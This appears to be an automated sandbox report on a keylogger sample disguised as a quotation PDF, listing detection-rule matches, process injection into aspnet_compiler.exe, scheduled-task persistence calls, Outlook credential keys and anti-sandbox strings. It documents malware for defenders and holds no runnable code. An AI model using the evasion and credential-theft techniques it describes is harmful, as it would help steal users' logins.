            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2225576342.00000228FF620000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameQhbnw.dll" vs QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214866648.0000022880380000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe Binary or memory string: OriginalFilenamePzlcy.exeH vs QUOTATION_NOVQTRA071244PDF.scr.exe
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 4.2.aspnet_compiler.exe.19050ae0000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 4.2.aspnet_compiler.exe.19060c900e8.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000004.00000002.2959415202.000001904EEC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000000.00000002.2215561209.00000228E70FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000004.00000002.2963455838.0000019060C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 00000004.00000002.2960594780.0000019050AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: Process Memory Space: aspnet_compiler.exe PID: 7792, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: aspnet_compiler.exe PID: 7792, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880380000.2.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880380000.2.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880380000.2.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880380000.2.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880380000.2.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880380000.2.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/0@4/3
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050F66000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2961287104.0000019050F75000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe ReversingLabs: Detection: 36%
            Source: unknown Process created: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe "C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe"
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E7016000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C31000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C81000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214866648.0000022880380000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E7016000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C31000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6C81000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214866648.0000022880380000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: protobuf-net.pdb source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2214794114.0000022880110000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2222200198.00000228F6F2C000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c81ab0.4.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6f2cb98.5.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6f2cb98.5.raw.unpack, ListDecorator.cs .Net Code: Read
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6f2cb98.5.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6f2cb98.5.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6f2cb98.5.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6c31a78.6.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880110000.1.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880110000.1.raw.unpack, ListDecorator.cs .Net Code: Read
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880110000.1.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880110000.1.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880110000.1.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880380000.2.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
            Source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880380000.2.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
            Source: Yara match File source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.22880090000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0.2.QUOTATION_NOVQTRA071244PDF.scr.exe.228f6e3e8f0.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000000.00000002.2214752450.0000022880090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.2215561209.00000228E6D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.2222200198.00000228F6D46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: QUOTATION_NOVQTRA071244PDF.scr.exe PID: 7268, type: MEMORYSTR
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Code function: 0_2_00007FFD9B89FA3D pushad ; iretd 0_2_00007FFD9B89FA47
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Code function: 0_2_00007FFD9B897967 push ebx; retf 0_2_00007FFD9B89796A
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Code function: 0_2_00007FFD9BAA4F9D push edi; retf 0_2_00007FFD9BAA59D6
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6D71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: EXPLORER SBIEDLL.DLL!CUCKOOMON.DLL"WIN32_PROCESS.HANDLE='{0}'#PARENTPROCESSID$CMD%SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE&VERSION'SERIALNUMBER)VMWARE|VIRTUAL|A M I|XEN*SELECT * FROM WIN32_COMPUTERSYSTEM+MANUFACTURER,MODEL-MICROSOFT|VMWARE|VIRTUAL.JOHN/ANNA0XXXXXXXX
            Source: QUOTATION_NOVQTRA071244PDF.scr.exe, 00000000.00000002.2215561209.00000228E6D71000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL2Y
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Memory allocated: 228E51C0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe Memory allocated: 228FEC20000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe Memory allocated: 19050990000 memory reserve | memory write watch
